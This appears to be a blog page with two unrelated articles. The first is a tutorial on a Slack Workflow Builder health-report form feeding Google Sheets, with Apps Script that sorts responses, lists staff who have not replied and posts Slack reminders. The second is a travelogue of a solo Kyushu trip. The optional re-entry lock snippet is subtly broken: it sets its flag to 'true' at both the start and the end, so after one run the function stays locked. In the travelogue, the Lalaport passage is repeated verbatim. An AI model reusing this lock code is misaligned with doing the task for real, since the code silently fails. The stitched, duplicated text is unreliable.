Workflow trigger method, select “Shortcut.”
Currently, there are 5 types of Slack workflow trigger points:
Here we choose “Shortcut” to create a manual trigger option.
Select which “Channel input box” this Workflow Shortcut should be added to and enter the “display name.”
*A workflow shortcut can only be added to one channel.
Shortcut created! Start creating workflow steps by clicking “Add Step.”
Select the “Send a form” Step.
Title: Enter the form title.
Add a question: Enter the first question’s title (you can label the question number in the title, e.g., 1., 2., 3…).
Choose a question type:
For “Select from a list”:
You can also choose to send the response to…:
After completing the form, click “Save” to save the step.
*Here we uncheck the option to return the form content because we want to customize the message content in later steps.
If you haven’t added the Google Sheet App to Slack yet, you can click here to install the APP.
Following the previous step, click “Add Step” to add a new step. We choose the “Add a spreadsheet row” step from Google Sheets for Workflow Builder.
Click “Insert Variable” in the lower right corner and select “Response to Question 1…”. After inserting, you can add other columns by clicking “Add Column” in the lower left corner. Repeat this process for Question 2, Question 3, etc.
For the email of the person filling out the form, you can select “Person who submitted form”.
Click on the inserted variable and select “Email” to automatically fill in the email of the person who filled out the form.
<@User ID>
The Timestamp column is a bit tricky; we will supplement the setting method later. First, click “Save” to save, then go back to the top right corner of the page and click “Publish” to publish the Shortcut.
After seeing the success message, you can go back to the Slack Channel and give it a try.
At this point, clicking the lightning bolt will show the Workflow form you just created, which you can click to fill out and play with.
Left: Desktop / Right: Mobile
We can fill in the information and “Submit” to test if it works properly.
Success! But you can see that the Timestamp column is empty. Next, we will solve this problem.
Slack workflow does not have a global variable for the current timestamp, at least not yet. I only found a wish post on Reddit.
Initially, I whimsically entered =NOW()
in the Column Value, but this way the time for all records is always the current time, which is completely wrong.
Thanks to the Reddit post and the tricky method provided by a great netizen, you can create a clean Timestamp Sheet with one row of data and a column =NOW()
. First, use Update to force the column to be the latest, then use Select to get the current Timestamp.
As shown in the structure above, click here to view the example.
=NOW()
to always display the current time.You can right-click on the Sheet and select “Hide Sheet” to hide this Sheet, as it is not intended for external use.
Go back to Slack Workflow Builder to edit the workflow form you just created.
Click “Add Step” to add a new step:
Scroll down and select “Update a spreadsheet row”:
“Select a spreadsheet” to choose the Sheet you just created, and “Sheet” to select the newly created “Timestamp” Sheet.
“Choose a column to search” and select “Row”. Define a cell value to find and enter “1”.
“Update these columns” and “Column name” select “Value”. Click “Insert variable” -> “Person who submitted” -> select “Email”.
Click “Save” to complete! Now the timestamp update in the Sheet has been triggered. Next, we will read it out for use.
Go back to the editing page and click “Add Step” again to add a new step. This time, select “Select a spreadsheet row” to read the Timestamp.
The search part is the same as “Update a spreadsheet row”. Click “Save”.
After saving, go back to the step list page. You can drag and drop to change the order by moving the mouse over the steps.
Change the order to “Update a spreadsheet row” -> “Select a spreadsheet” -> “Add a spreadsheet row”.
This means: Update to trigger the timestamp update -> Read the Timestamp -> Use it when adding a new Row.
Click “Edit” to edit “Add a spreadsheet row”:
Scroll to the bottom and click “Add Column” in the lower left corner, then click “Insert a variable” in the lower right corner. Find the “Timestamp” variable in the “Select a spreadsheet” section and inject it.
Click “Save” to save the step and return to the list page. Click “Publish Change” in the upper right corner to publish the changes.
Now, test the workflow shortcut again to see if the timestamp is written correctly.
Success!
Similar to the submission receipt in Google Form, the Slack workflow form can also have one.
On the step editing page, we can add another step by clicking “Add Step”.
This time, choose “Send a message”
Select “Send this message to” and choose “Person who submitted form”
Enter the message content in order, the question title, “Insert a variable” and select “Response to question XXX”. You can also insert “Timestamp” at the end. After saving the steps by clicking “Save”, click “Publish Changes”!
Additionally, you can use “Send a message” to send the filled results to a specific Channel or DM.
Success!
The setup of the Slack workflow form is roughly complete. You can freely combine and play with other features.
Next, we need to write an App Script to handle the filled data.
First, select “Tools” -> “Script editor” from the toolbar at the top of Google Sheet.
You can click the top left corner to give the project a name.
Now we can start writing App Script! App Script is designed based on Javascript, so you can directly use Javascript code with Google Sheet’s library.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+
function formatData() {
+ var bufferSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Responses') // Name of the Sheet storing responses
+
+ var rows = bufferSheet.getDataRange().getValues();
+ var fields = [];
+ var startDeleteIndex = -1;
+ var deleteLength = 0;
+ for(index in rows) {
+ if (index == 0) {
+ fields = rows[index];
+ continue;
+ }
+
+ var sheetName = rows[index][0].toLocaleDateString("en-US"); // Convert Date to String, using US date format MM/DD/YYYY
+ var sheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName(sheetName); // Get MM/DD/YYYY Sheet
+ if (sheet == null) { // If not exist, create new
+ sheet = SpreadsheetApp.getActiveSpreadsheet().insertSheet(sheetName, bufferSheet.getIndex());
+ sheet.appendRow(fields);
+ }
+
+ sheet.appendRow(rows[index]); // Add data to date Sheet
+ if (startDeleteIndex == -1) {
+ startDeleteIndex = +index + 1;
+ }
+ deleteLength += 1;
+ }
+
+ if (deleteLength > 0) {
+ bufferSheet.deleteRows(startDeleteIndex, deleteLength); // After moving to the specified Sheet, remove data from Responses
+ }
+}
+
Paste the above code into the Code block and press “control” + “s” to save.
Next, we need to add a trigger button in the Sheet (can only be triggered manually, cannot be automatically triggered when data is written)
Use this interface to draw a button.
After “Save and Close”, you can adjust and move the button; click the top right “…” and select “Assign script”.
Enter the function name “formatData”.
You can click the added button to test the function.
If “Authorization Required” appears, click “Continue” to complete the verification.
During the authentication process, “Google hasn’t verified this app” will appear. This is normal because the App Script we wrote is not verified by Google, but that’s okay since it’s for personal use.
Click “Advanced” at the bottom left -> “Go to Health Report (Responses) (unsafe)”.
Click “Allow”.
While the App Script is running and shows “Running Script”, please do not press again to avoid repeated execution.
Only after the execution is successful can you run it again.
Success! The data is grouped by date.
Let’s add a piece of code:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+
// Compare the employee list Sheet & today's filled Sheet to generate the unfilled list
+function generateUnfilledList() {
+ var listSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Employee List') // Employee list Sheet name
+ var unfilledListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Unfilled List') // Unfilled list Sheet name
+ var today = new Date();
+ var todayName = today.toLocaleDateString("en-US");
+
+ var todayListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName(todayName) // Get today's MM/DD/YYYY Sheet
+ if (todayListSheet == null) {
+ SpreadsheetApp.getUi().alert('Cannot find today\'s Sheet ' + todayName + ' or please run "Organize Filled Data" first');
+ return;
+ }
+
+ var todayEmails = todayListSheet.getDataRange().getValues().map( x => x[1] ) // Get today's Sheet Email Address column data list (1 = Column B)
+ // index start from 0, so 1 = Column B
+ // output: Email Address,zhgchgli@gmail.com,alan@gamil.com,b@gmail.com...
+ todayEmails.shift() // Remove the first data, the first is the column name "Email Address" which is meaningless
+ // output: zhgchgli@gmail.com,alan@gamil.com,b@gmail.com...
+
+ unfilledListSheet.clear() // Clear the unfilled list... prepare to refill data
+ unfilledListSheet.appendRow([todayName + " Unfilled List"]) // The first row shows the Sheet title
+
+ var rows = listSheet.getDataRange().getValues(); // Read the employee list Sheet
+ for(index in rows) {
+ if (index == 0) { // The first row is the header row, save it, so that the subsequent generated data can also add the first row header
+ unfilledListSheet.appendRow(rows[index]);
+ continue;
+ }
+
+ if (todayEmails.includes(rows[index][3])) { // If today's Sheet Email Address contains this employee's Email, it means it has been filled, continue to skip... (3 = Column D)
+ continue;
+ }
+
+ unfilledListSheet.appendRow(rows[index]); // Write a row of data to the unfilled list Sheet
+ }
+}
+
After saving, follow the previous method to add code, then add a button and assign the script — “generateUnfilledList”.
Once completed, you can click to test:
Unfilled list generated successfully! If no content appears, please ensure:
First, we need to add the Incoming WebHooks App to the Slack Channel. We will use this medium to send messages.
Select the Channel where you want to send the unfilled message.
Note down the “Webhook URL” at the top.
Scroll down to set the name and avatar of the Bot when sending messages; remember to click “Save Settings” after making changes.
Back to our Google Sheet Script
Add another piece of code:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+
function postSlack() {
+ var ui = SpreadsheetApp.getUi();
+ var result = ui.alert(
+ 'Are you sure you want to send the message?',
+ 'Send unfilled reminder message to Slack Channel',
+ ui.ButtonSet.YES_NO);
+ // To avoid accidental touches, ask for confirmation first
+
+ if (result == ui.Button.YES) {
+ var unfilledListSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Unfilled List') // Unfilled List Sheet name
+ var rows = unfilledListSheet.getDataRange().getValues();
+ var persons = [];
+ for(index in rows) {
+ if (index == 0 || index == 1) { // Skip the title and column header rows
+ continue;
+ }
+
+ var person = (rows[index][4] == "") ? (rows[index][2]) : ("<@"+rows[index][4]+">"); // Mark the target, use slack uid if available, otherwise just display the nickname; 2 = Column B / 4 = Column E
+ if (person == "") { // Consider it as abnormal data if both are empty, ignore
+ continue;
+ }
+ persons.push("• "+person+'\n') // Store the target in the array
+ }
+
+ if (persons.length <= 0) { // If no target needs to be notified, everyone has filled in, cancel the message sending
+ return;
+ }
+
+ var preText = "*[Health Report Announcement:loudspeaker:]*\nThe company cares about everyone's health, please remember to fill in the daily health status report, thank you:wink:\n\nToday's unfilled health status report list\n\n" // Message opening content...
+ var postText = "\n\nFilling in the health status report allows the company to understand the health status of teammates, please make sure to fill it in every day>< Thank you everyone:woman-bowing::skin-tone-2:" // Message closing content...
+ var payload = {
+ "text": preText+persons.join('')+postText,
+ "attachments": [{
+ "fallback": "You can put the Google Form filling link here",
+ "actions": [
+ {
+ "name": "form_link",
+ "text": "Go to Health Status Report",
+ "type": "button",
+ "style": "primary",
+ "url": "You can put the Google Form filling link here"
+ }
+ ],
+ "footer": ":rocket:Tip: Click the \":zap:️lightning\" below the input box -> \"Shortcut Name\" to fill in directly."
+ }
+ ]
+ };
+ var res = UrlFetchApp.fetch('Enter your slack incoming app Webhook URL here',{
+ method : 'post',
+ contentType : 'application/json',
+ payload : JSON.stringify(payload)
+ })
+ }
+}
+
After saving, follow the previous method to add code, then add a button and assign the script — “postSlack”.
Once completed, you can click to test:
Success!!! (The display @U123456 did not successfully tag the person because the ID was randomly typed by me)
At this point, the main functions are all completed!
Note
Please note that the official recommendation is to use the new Slack APP API’s chat.postMessage to send messages. The simpler method of Incoming Webhook will be deprecated. I did not use it here for convenience. You can adjust to the new method along with the next chapter “Import Employee List,” which will require the Slack App API.
Here we need to create a Slack APP.
Click “Create New App” in the upper right corner
Add the following items in “Add an OAuth Scope”:
*If Scopes are added, you need to come back and reinstall.
After installation, get and copy the Bot User OAuth Token
Use the web version of Slack to open the Channel where you want to import the list
Get the URL from the browser:
1
+
https://app.slack.com/client/TXXXX/CXXXX
+
Where CXXXX
is the Channel ID of this Channel, note this information.
10.
Go back to our Google Sheet Script
Add the following code:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
function loadEmployeeList() {
+ var formData = {
+ 'token': 'Bot User OAuth Token',
+ 'channel': 'Channel ID',
+ 'limit': 500
+ };
+ var options = {
+ 'method' : 'post',
+ 'payload' : formData
+ };
+ var response = UrlFetchApp.fetch('https://slack.com/api/conversations.members', options);
+ var data = JSON.parse(response.getContentText());
+ for (index in data["members"]) {
+ var uid = data["members"][index];
+ var formData = {
+ 'token': 'Bot User OAuth Token',
+ 'user': uid
+ };
+ var options = {
+ 'method' : 'post',
+ 'payload' : formData
+ };
+ var response = UrlFetchApp.fetch('https://slack.com/api/users.info', options);
+ var user = JSON.parse(response.getContentText());
+
+ var email = user["user"]["profile"]["email"];
+ var real_name = user["user"]["profile"]["real_name_normalized"];
+ var title = user["user"]["profile"]["title"];
+ var row = [title, real_name, real_name, email, uid]; // Fill in according to Column
+
+ var listSheet = SpreadsheetApp.getActiveSpreadsheet().getSheetByName('Employee List'); // Employee list Sheet name
+ listSheet.appendRow(row);
+ }
+}
+
But this time we don’t need to add the button again, because the import is only needed the first time; so just save and run directly.
First, press “control” + “s” to save, change the top dropdown menu to “loadEmployeeList”, and click “Run” to start importing the list into the Employee List Sheet.
If new employees join later, you can directly add a row in the Employee List Sheet and fill in the information. The Slack UID can be directly queried on Slack:
Click on the person whose UID you want to view, and click “View full profile”
Click “More” and select “Copy member ID” to get the UID. UXXXXX
All the above steps are completed, and you can start automating the tracking of employees’ health status.
The completed file can be copied and modified from the following Google Sheet:
If you want to prevent accidental re-execution during execution, you can add at the beginning of the function:
1
+2
+3
+4
+5
+
if (PropertiesService.getScriptProperties().getProperty('FUNCTIONNAME') == 'true') {
+ SpreadsheetApp.getUi().alert('Busy... Please try again later');
+ return;
+}
+PropertiesService.getScriptProperties().setProperty('FUNCTIONNAME', 'true');
+
Add at the end of the function execution:
1
+
PropertiesService.getScriptProperties().setProperty('FUNCTIONNAME', 'true');
+
Replace FUNCTIONNAME with the target function name.
Use a global variable to control execution.
Can be used to connect CI/CD, using GUI to package the original ugly command operations, such as using Slack Bitrise APP, combining Slack Workflow form to trigger Build commands:
After submission, it will send a command to the private channel with the Bitrise APP, EX:
1
+
bitrise workflow:app_store|branch:develop|ENV[version]:4.32.0
+
This will trigger Bitrise to execute the CI/CD Flow.
If you have any questions or feedback, feel free to contact me.
If you have any automation-related optimization needs, you are also welcome to commission me. Thank you.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Record of a 10-day solo trip to Fukuoka, Nagasaki, and Kumamoto in Kyushu
At the end of August, I officially left Pinkoi after nearly 3 years. I had been contemplating leaving for a while, and earlier in the year, I decided to take a break from work, explore outside, and reassess the situation upon my return. So, I embarked on trips with friends to “[Travelogue] 2023 Kansai & 🇯🇵 First Landing” and with colleagues to “[Travelogue] 2023 Tokyo & 🇯🇵 Second Landing.” However, upon returning, I felt a stronger urge to break free, coinciding with the completion of my tasks. I gathered my courage to step out of my comfort zone, seeking the next challenge!
The “[Travelogue] Flash Visit to Nagoya on 9/11” was purely accidental and felt more like a march than a relaxing trip.
Taking advantage of a rare opportunity, I decided to explore Japan once again. The original plan was to travel with a friend who was also on a break to 🇰🇷 Busan ➡️ 🇯🇵 Fukuoka ➡️ 🇯🇵 Kumamoto; traveling from Korea to Kumamoto, with a stop in Fukuoka where we could board the New Camellia cruise ship, arriving in Fukuoka after a 12-hour overnight journey, covering both commuting and accommodation.
However, my friend found a job in September and I couldn’t find a new travel companion at the moment. Not keen on extensive travel alone, I decided to forgo the 🇰🇷 Busan ➡️ 🇯🇵 Fukuoka segment and instead opted for the 🇯🇵 Fukuoka ➡️ 🇯🇵 Kumamoto route.
With a scattered schedule starting in October and plans to begin job hunting, I scheduled my departure at the end of September (9/17–9/26).
I’ll start with the summary and reflection. I came across a quote in a travel group that resonated with me: “Traveling is a continuous payment of tuition (time or money) for learning. The more experience you gain, the fewer pitfalls you’ll encounter.”
👍
👎
[Japan JR PASS | Kyushu Area Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/en/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/en/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki Day Tour | Glover Garden, Oura Tenshudo Church & Nagasaki Atomic Bomb Museum, Peace Park & Inasayama Night View (One of the Three Best Night Views in the World/Including Round-Trip Cable Car) | Optional Huis Ten Bosch Fireworks Package | Departing from Fukuoka/Chinese Group](https://www.kkday.com/en/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
Initially considered entering Fukuoka and leaving Fukuoka, going back and forth to Kumamoto for one or two days (later proved to be correct XD, not many attractions in Kumamoto, don’t need to stay too long); found that China Airlines had a flight from Fukuoka to Kumamoto for only $1,000, so decided to take this flight.
Because there was plenty of time, I chose the most luxurious option, departing at noon and returning at noon, totaling 10 days including the flight time.
Price: $10,048
Due to the vast area of Kyushu, this time I bought the JR Pass Kyushu Rail Pass (5 days), thinking it would be worth it no matter how much I travel.
When arranging, without much consideration or research, I thought I hadn’t been to Fukuoka or Kumamoto; so I decided to split the stay into 5 days in Fukuoka and 4 days in Kumamoto.
Fukuoka 5 nights - Fukuoka Tenjin Benikea Carlton Hotel (Benikea Calton Hotel Fukuoka Tenjin)
Kumamoto 4 nights - Green Rich Hotel Suizenji (Green Rich Hotel Suizenji)
JR Kumamoto -> Hotel
Hotel -> Kumamoto Airport
It’s difficult to find accommodation in Kumamoto (maybe because they are all booked by TSMC for business trips), with limited choices, higher prices compared to Fukuoka, and old facilities; finally found this relatively cheap hotel.
Once the hotel is booked, you can proceed to fill out the online immigration application.
Original plan:
This trip was also very impulsive, bought the plane tickets and booked the accommodation on 9/10, planned the itinerary on 9/15, and departed on 9/17!
The flight at 16:40 in the afternoon, plenty of time to wake up slowly and head out leisurely.
Arrived at Taipei Main Station A1 Airport MRT, opted for advance check-in as usual, completed the check-in and baggage drop at the station, and walked out of the airport upon arrival, no need to queue at the counter with people (For advance check-in information, please refer to the official website).
This time also used Airtag to track the luggage, no worries about lost luggage, and very convenient while waiting for the baggage carousel.
Around 13:00 arrived at the airport, wandered around after exiting.
Had an expensive and mediocre chicken dish, checked the luggage location casually; the luggage also made it to the airport with me.
After eating, it was only around 14:30, bought a Japanese book on a whim.
Encountered another plane taking the wrong runway, the entire airport had to reset; the plane took a big circle before taking off, delayed for about 30 minutes; the TV on the old plane was very small.
China Airlines collaborates with Wutong No. 5 to create the cutest desserts in the air, featuring Dinotaeng, the adorable short-tailed kangaroo, and the osmanthus oolong tea is quite delicious.
Due to a flight delay, I only left the airport around 9:00 PM.
After leaving the airport, you can see a sign indicating the direction to go and where to wait for the bus stop; besides going to Hakata, you can also go to other places, refer to this article or the official website; if you are going to a distant place, make sure to check the schedule.
Originally planned to take the direct bus to Hakata Station, but it seemed like the last bus was still an hour away (I forgot), so I changed to take bus 1 to Fukuoka Airport Domestic Line (Fukuoka Airport Subway Station), then took the subway to Hakata and transferred to the Nanakuma Line at Watanabe-dori Station.
The hotel to check in is on the left side of the second photo.
Hotel room tour, overall a bit old, dim lighting, average soundproofing, and the air conditioning makes a slight noise, but still clean and tidy; however, I kind of regret not spending a little more to stay at the APA chain hotel nearby.
Originally planned to visit the food stalls on the first night, but due to fatigue, I just grabbed something from the convenience store and rested early to prepare for the next day’s itinerary.
View of Fukuoka city from outside the bed in the early morning.
Taking the subway to Hakata is a bit roundabout, it’s faster to walk directly to Watanabe-dori and take a bus to Hakata.
Upon arrival in Hakata, go to the manned counter to exchange for the JR Pass (present your passport) and reserve a seat for the trip to Nagasaki. There are many foreigners exchanging for the JR Pass, so I waited for almost an hour before my turn. It is recommended to leave early or go to exchange in advance.
I bought a 5-day pass, which starts counting from the day of exchange. Use the pass with the date and amount for entering and exiting the station; the reserved seat ticket is just to know where your seat is and cannot be used to enter and exit the station. Keep the pass safe as you will need it for the next five days; if lost, it cannot be replaced!
There are two segments from Hakata to Nagasaki, first to Takeo Onsen and then change trains to Nagasaki from Takeo Onsen; changing trains on the same platform, they have the train times well calculated, so basically, after arriving, just walk to the opposite side to board the train.
When waiting for the train, I found that the trains in Kyushu are very distinctive!!
The seats are large and comfortable, and you can enjoy the scenery by the window.
Travel time: about 1 hour 50 minutes
Side note: Completed a citizen diplomacy mission ✅
When I was on the train, there was a family sitting next to me. The parents took their two children out to play, and one of the children suddenly vomited halfway through the journey. The father didn’t have tissues at hand, so he used a newspaper to wipe it. I handed him some tissues and wet wipes.
When it was time to get off the train, the father gave me a souvenir from Miyauchi City (shrimp rice crackers).
After exiting Nagasaki Station, the weather was great! I was worried it might rain today.
After leaving the station, head towards the Nagasaki streetcar direction.
First, head south to Nagasaki Shinchi Chinatown.
It may be a unique spot for foreigners, but for Chinese people, it’s okay. They sell Nagasaki specialties like scratch bags, Changdian udon, Qiangbang noodles, xiaolongbao… But I wasn’t very hungry at the time, so I just passed by.
On the way to Glover Garden, I also passed by the Confucius Temple XD
Passing through the Dutch Slope (just a slope), then taking the escalator up to Glover Garden Entrance 2, the whole terrain is a large hill facing the sea.
Enter Glover Garden and admire the architecture style and interior decorations; it’s very similar to Fort San Domingo in Tamsui (because both were built by the Dutch).
Don’t forget to exchange for a free photo, where you can also overlook the cruise ships at Nagasaki Port.
On the way down the mountain, you will pass by the Oura Catholic Church, I didn’t go in, just took a photo and left.
Bought some scratch bags from Nagasaki to try, but I still think Taiwan’s taste better!
On the way back north to the Nagasaki Atomic Bomb Museum, stop by Meganebashi Bridge to take photos. The reflection in the water from the front view is really beautiful, worth a shot if you have time.
Visiting the Atomic Bomb Museum is more about immersion and reflection. The museum has designed many scenes (from the time of the explosion or immersive experiences), installation art, historical data, interviews; allowing visitors to immerse themselves in the historical atmosphere and reflect on the cruelty and horror of future wars.
After leaving the Atomic Bomb Explosion Point, you will arrive at Peace Park.
Colorful paper cranes are hung along the road (including the Atomic Bomb Museum) as a symbol of praying for peace.
After leaving Peace Park, take a break at Dejima before heading to see Mount Inasa Night View, one of the world’s three major night views.
To get to Mount Inasa, walk a short distance from Dejima to the bus stop for the Inasa Ropeway (Fuchi Shrine Station). Then stroll to the station and wait for the cable car.
Unfortunately, the bus was delayed, and there was no electronic sign at the small station. After waiting for more than 5 minutes and thinking the bus might not be running that day, I quickly checked other nearby bus stops that go to Fuchi Shrine. I walked another 10 minutes to another bus stop to catch a different bus.
Funny thing is, halfway there, I saw the delayed bus coming… but it was too late Orz
Across from where I got off the bus is Fuchi Shrine. I walked up and passed through a kindergarten to reach the Nagasaki Ropeway (Fuchi Shrine Station). Since I didn’t plan to stay too late, I bought a round-trip ticket directly (cheaper, but if you stay too late, there might not be a cable car available, and you’ll have to take the bus back).
After getting off the cable car, there is another cable car for mountain viewing, but I didn’t try it. So, I walked straight towards the observation deck.
I forgot to take a photo of the observation deck, which is a 360-degree tower where you can see the entire Nagasaki city, harbor, and mountains without needing a ticket. You can start by watching the sunset from the west as the sun sets over the harbor and continue to enjoy the night view of the city from the east.
The observation deck is spacious and can accommodate many people.
After sunset, you can enjoy the beautiful night view of the entire Nagasaki city and the station.
Finally, take a last look at the night view of Nagasaki Station, buy a Nagasaki cake souvenir (later found out they are also sold in Hakata, with a shelf life of about 12 days, so it’s better to buy them later…), and get ready to return to Hakata.
_If you don’t want to visit all these places on your own, you can refer to KKday’s [**Nagasaki Day Tour Glover Garden · Oura Cathedral & Nagasaki Atomic Bomb Museum · Peace Park & Mount Inasa Night View (One of the World’s Three Major Night Views/Including Round-trip Cable Car) Optional Huis Ten Bosch Fireworks Plan Departing from Fukuoka/Chinese Tour**](https://www.kkday.com/zh-tw/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”blank”}
Encountered another delay, this time due to a JR (signal failure); arrived at Hakata almost an hour late (already tired), the driver was driving fast and it felt shaky.
Bought a late-night snack and returned to the hotel to rest.
In the morning, first visit the Fukuoka (Tenjin) Tourist Information Center to buy a one-day pass (Fukuoka Tenjin, Hakata, or online ticket purchase available), you can calculate if it’s cheaper.
KKday Kyushu Ticket Dazaifu Yufuin Tour Package (Taoyuan Airport Pickup)
Nishitetsu - A day trip to the ancient city of Dazaifu and the water town of Yufuin.
Additionally, you will receive two coupon books, the Dazaifu book has a voucher for a free plum branch cake.
The order is not fixed, but the boat tour has a time limit, it ends after 2 pm; so just follow the itinerary, Fukuoka -> Yanagawa -> Dazaifu -> Fukuoka.
After buying the tickets, go to the manned window, show the ticket to the station staff, and you can board the train directly (no need to reserve seats) to Yanagawa.
Travel time: about 1 hour 10 minutes
After exiting the station, you will see staff wearing white vests (if there is no service center nearby, you can ask), they will provide you with a map + return route + timetable and guide you to take the shuttle bus to the boarding point.
When exiting the station, go to the manned ticket gate, the staff will tear off the ticket from Fukuoka to Yanagawa station.
Originally thought of walking the distance, but upon exiting, saw staff guiding with care, so fortunately took the bus.
Arrived at the boarding point and waited for the next boat, coincidentally met a Taiwanese family traveling in front, joined them on the spot, chatted along the way (after all, I was traveling alone and don’t speak Japanese, hardly talked to anyone in Kyushu).
The water is very clean, this season’s lush green is not as beautiful, but relatively fewer people.
The boatman will introduce the passing sights along the way, and sing songs (most Taiwanese would have heard, many old songs).
When crossing the bridge, the boatman will ask everyone to bow their heads to avoid hitting, quite interesting; there is not much shade on the way, a bit sunny.
You will pass by an ice shop on the way, selling fruit ice, you can buy one to cool off; the boatman will also give each person an ice pack to cool down (very thoughtful).
I chatted with the Taiwanese family’s father who was in front of me all the way, and in the end, I even got a business card.
After getting off the boat, I couldn’t find a free shuttle seat, and I ended up queuing for the wrong queue and was refused to board the shuttle (not the West Rail Pass); you need to study the boarding point on the map (Chuanliu Shipyard (Chongzhinan)) or ask directly for a faster way.
I later walked to take the bus back to the West Rail Yanagawa Station.
From Yanagawa to Dazaifu, you need to transfer to the train to Dazaifu at Futsukaichi Station (to another platform).
Travel time: about 1 hour
Take the Tabito-go train to Dazaifu, via Gojo (2.5 Go QQ); it’s a bit like going from Beitou to Xinbeitou, just one train back and forth.
There is a section in the middle of the train that displays artifacts from Dazaifu and you can write postcards, you can go take a look.
Dazaifu Station is also beautiful, and the Lawson outside has a very Japanese vibe.
On the right side of the exit is the only pentagonal (Japanese qualified) bowl Ichiran Ramen in the world.
After eating ramen, try a plum branch cake, which is not really related to plums, more like red bean grilled rice cake, it tastes better when the skin is freshly made!
I forgot to exchange the return voucher given by the West Rail Pass, spent 150 yen to buy one myself; seeing that the expiration date is only one day, I couldn’t bring it back to Taiwan.
Continue along Omotesando towards Dazaifu and you will pass by one of the most beautiful Starbucks in Japan, the space is quite large but crowded, so I left without stopping.
The bridge leading to the shrine should be quite nice to take photos at night + fewer people, too many people make it difficult to take good photos.
After visiting, return to Dazaifu Station and head back to Fukuoka Lalaport.
Similarly, return to Nijinomachi from Dazaifu Station and transfer to a train bound for Hakata. Get off at Ohashi (Fukuoka), go left after exiting the station to find the direct bus to Lalaport. Hop on, and you will arrive at Fukuoka Lalaport after one stop.
Total travel time: about 50 minutes
Upon arrival, you will see the huge Fukuoka Gundam outside.
Lalaport is large, great for shopping, and suitable for families. There is a large playground upstairs where children play and people rest.
Upstairs, there is a Jump Shop selling merchandise related to Shonen Jump Weekly, including Haikyuu!!, One Piece, Hunter x Hunter, Jujutsu Kaisen, Chainsaw Man, and more. I bought some Jujutsu Kaisen merchandise.
If you spend over 5000 Japanese Yen, you can get a tax refund, but it seems to be refunded through their app or something, a bit complicated, and food is not included.
Go to the food street and have a Miyazaki beef bowl. Before leaving, I bought some snacks to take back (curry bread, like Mizuhoan daifuku).
The Gundam that lights up at night is quite impressive.
For the return direct bus, do not take it from where you originally got off. Follow the signs inside the building and take the bus directly from the bus stop inside the building.
Return to the hotel to rest, using a tablet (the TV is too old and lacks smart functions). The curry bread is crispy and delicious, with meat filling inside, and the daifuku is good too, but I prefer Benzaiten.
In the early morning, head to Hakata Station again, take the JR to Moji Port, and then return to Kokura Castle.
[_KKday Itinerary Reference: Japan Fukuoka Kitakyushu One-Day Charter Tour Dazaifu Tenmangu Shrine, Moji Port, Karato Market, Kanmon Strait, Akama Shrine_](https://www.kkday.com/zh-tw/product/157874?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Upon arrival, you will see the huge Fukuoka Gundam outside.
Lalaport is large, great for shopping, and suitable for families. There is a large playground upstairs where children play and people rest.
Upstairs, there is a Jump Shop selling merchandise related to Shonen Jump Weekly, including Haikyuu!!, One Piece, Hunter x Hunter, Jujutsu Kaisen, Chainsaw Man, and more. I bought some Jujutsu Kaisen merchandise.
If you spend over 5000 Japanese Yen, you can get a tax refund, but it seems to be refunded through their app or something, a bit complicated, and food is not included.
Go to the food street and have a Miyazaki beef bowl. Before leaving, I bought some snacks to take back (curry bread, like Mizuhoan daifuku).
The Gundam that lights up at night is quite impressive.
For the return direct bus, do not take it from where you originally got off. Follow the signs inside the building and take the bus directly from the bus stop inside the building.
Return to the hotel to rest, using a tablet (the TV is too old and lacks smart functions). The curry bread is crispy and delicious, with meat filling inside, and the daifuku is good too, but I prefer Benzaiten.
Arrived at Moji Port without any surprises or dangers (worried about being fined).
Walking out of the station is Moji Port, usually deserted; happened to catch the Blue Wing Moji Suspension Bridge being lowered.
After it’s lowered, you can walk to the observation tower at the back and overlook the entire Moji Port.
Coming out of the tower, you can take a walk around Moji Port.
For lunch, try the famous curry in Moji Port.
Moji is very close to Kokura, but Kokura is a small station, quite desolate when you exit, got lost looking for the entrance to Kokura and ended up circling a big round, when in fact the entrance is on the side of the Mall outside Kokura.
Kokura Castle is small, with quite a few things to see inside, just that the view from the main keep is quite ordinary (you can see the Mall from the front).
After visiting, return to the station and take a train back to Hakata, obediently taking the JR, but as it’s a small station, only local trains are available, so it took more than an hour to slowly return.
Returning to Hakata with time to spare, went to Canal City Hakata and wandered around the city center.
Didn’t check specifically, thought it was some kind of “castle” or “moat”, turns out it’s a department store XD, indeed with a “moat” and water fountain performances.
There are plenty of places to shop around here, including a Jump Shop.
Still early, wandered around and ended up eating Hakata Gion Teppan Gyoza.
